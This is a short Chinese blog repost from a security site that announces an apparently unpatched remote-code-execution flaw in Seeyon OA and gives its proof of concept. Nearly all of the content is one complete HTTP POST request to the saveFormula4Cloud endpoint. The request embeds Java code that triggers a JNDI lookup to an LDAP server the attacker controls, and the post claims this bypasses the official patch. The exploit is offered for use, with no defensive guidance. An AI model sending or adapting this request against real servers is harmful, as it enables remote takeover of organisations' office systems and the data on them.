致远oa0dayRce漏洞

admin 2024年6月13日23:47:15评论73 views字数 820阅读2分44秒阅读模式

致远oa0dayRce漏洞

话不多说Poc,后台漏洞

jndi,也可以写文件。jndi支持的版本更多因为绕过了官方的补丁,打的版本自行测试。

POST /seeyon/ajax.do?method=ajaxAction&managerName=formulaManager&managerMethod=saveFormula4Cloud HTTP/1.1Content-Type: application/x-www-form-urlencoded; charset=UTF-8User-Agent: Cozilla/5.0 (Vindows Et 6.1; Sow64; rident/7.0; rv:11.0)Accept-Encoding: gzip, deflateCookie: JSESSIONID=36B0163EA8D303B27AFEBDF158D0AF6C;Cache-Control: no-cacheContent-Encoding: deflatePragma: no-cacheHost: xxxxxAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Length: 311Connection: closeX-Forwarded-For: 1.2.3.4arguments={"formulaName":"test","formulaAlias":"safe_pre","formulaType":"2","formulaExpression":"","sample":"javax.naming.InitialContext initialContext = new javax.naming.InitialContext();Object lookup = initialContext.lookup("ldap://xx.xx.xx.xx");"}

原文始发于微信公众号(代码审计Study):致远oa0dayRce漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月13日23:47:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   致远oa0dayRce漏洞https://cn-sec.com/archives/2842088.html

发表评论

匿名网友 填写信息